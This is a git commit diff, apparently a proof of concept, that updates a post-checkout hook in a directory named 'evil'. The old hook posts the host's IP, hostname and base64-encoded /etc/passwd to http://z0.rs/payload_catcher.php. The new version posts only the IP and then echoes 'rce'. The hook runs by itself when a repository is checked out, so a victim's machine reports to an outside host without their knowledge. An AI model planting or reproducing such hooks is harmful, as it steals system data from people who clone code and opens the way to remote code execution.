Update modules/1/2/3/4/evil/hooks/post-checkout
This commit is contained in:
parent
4955acfca9
commit
c4a5648eff
|
|
@ -1,3 +1,3 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"
|
curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')";
|
||||||
echo 'rce'
|
echo 'rce';
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue